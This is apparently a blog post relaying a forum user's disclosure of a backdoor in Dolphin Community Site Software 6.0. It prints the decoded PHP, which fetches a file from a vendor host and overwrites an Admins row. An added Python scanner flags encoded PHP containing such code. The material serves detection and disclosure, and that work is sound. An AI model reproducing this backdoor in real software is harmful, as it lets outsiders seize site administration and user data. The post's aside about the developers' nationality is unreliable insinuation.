Dolphin Community Site Software, Security Backdoor
Someone has found a security backdoor in the code behind Dolphin Community Site Software.
Basically, this code – itself ineptly encoded to obfuscate itself – allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. This will then allow them to log in as Admin, giving them complete access to your website and, potentially, any database servers you are connected to.
Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites, and one can see the potential data-mining rewards available.
p.s. the Boonex team is Russian.
Here is his post (English is not his first language):
—————————-
I was checking some of the encoded code in version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.
Please search for the following line in “inc/admin.inc.php” (this is all on one very long line)
Do you know what it is?
I have just decoded it for you:
if( true || $_GET['page'] ) foreach( $_GET as $sKey => $sValue ) {
if( gettype( $sKey ) != 'string' or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== '8f0ae5966e872788bce355863eabfc0c' or md5( $sValue ) !== '2a32a42aedbd642cffa40f8ec066f2a4') continue;
if(true || strlen( $sPassPage = preg_replace( '/[^a-zA-Z0-9_\.-]/', '', $_GET['page'] ) ) and $aPassFile = @file( 'http://www.boonex.com/' . $sPassPage ) ) {
foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === 'dad4096602477d319e04eefb38697fd3' )
echo ( db_res( "DELETE FROM `Admins` WHERE `Name` = '{$aPassFile[1]}'", 0 ) and db_res( "INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}', `Password` = '{$aPassFile[2]}'", 0 ) ) ? 'add success' : 'add failed'; exit; } break;
}
It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0, I would suggest you check your DB immediately.
Of course don’t forget to remove those lines from your code.
I have no idea about newer versions. I think it is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.
I hope this will save many sites from being hacked by the programmers of the Dolphin.
Regards
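
Added example, not part of the original post or of Dolphin's own code: a Python scanner a site owner could run over PHP sources to find long base64 literals and flag the ones that decode to the behaviours seen in the decoded code above (writes to the `Admins` table, a remote `file()` fetch, md5-gated request parameters). The 80-character run length, the 95% printable cutoff, the indicator names and the sample input are assumptions chosen for illustration.

```python
import base64
import binascii
import re

# Long runs of base64 alphabet; 80+ characters skips ordinary identifiers (assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")

# Indicators taken from the decoded code quoted in the post above.
INDICATORS = {
    "writes to Admins table": re.compile(r"(INSERT\s+INTO|DELETE\s+FROM)\s+`?Admins`?", re.I),
    "fetches remote file": re.compile(r"\bfile\s*\(\s*['\"]https?://", re.I),
    "md5-gated parameter": re.compile(r"md5\s*\(\s*\$\w+\s*\)\s*!?==", re.I),
}

def decode_run(run):
    """Return the decoded text if `run` is base64 for mostly printable text, else None."""
    run = run.rstrip("=")
    run += "=" * (-len(run) % 4)  # normalise padding before strict decoding
    try:
        text = base64.b64decode(run, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None
    printable = sum(c.isprintable() or c in "\r\n\t" for c in text)
    return text if printable >= 0.95 * len(text) else None

def scan_php(source):
    """Return [(line_number, [indicator names])] for encoded literals hiding suspicious PHP."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in B64_RUN.finditer(line):
            text = decode_run(match.group())
            hits = [n for n, rx in INDICATORS.items() if text and rx.search(text)]
            if hits:
                findings.append((lineno, hits))
    return findings

# Constructed sample input (not the real inc/admin.inc.php):
# line 3 hides code in base64, line 4 is encoded binary data that must not be flagged.
_HIDDEN = ('if( md5( $k ) !== "0000" ) continue; $f = @file( "http://vendor.example/" . $p ); '
           'db_res( "INSERT INTO `Admins` SET `Name` = \'{$f[1]}\'", 0 );')
SAMPLE = "\n".join([
    "<?php",
    "$title = 'Admin panel';",
    "$x = '" + base64.b64encode(_HIDDEN.encode()).decode() + "';",
    "$logo = '" + base64.b64encode(bytes(range(256))).decode() + "';",
])

if __name__ == "__main__":
    for lineno, hits in scan_php(SAMPLE):
        print(f"line {lineno}: {', '.join(hits)}")
```

A hit only says where to look: read the decoded text before removing anything, and review the rows of the `Admins` table as the post advises.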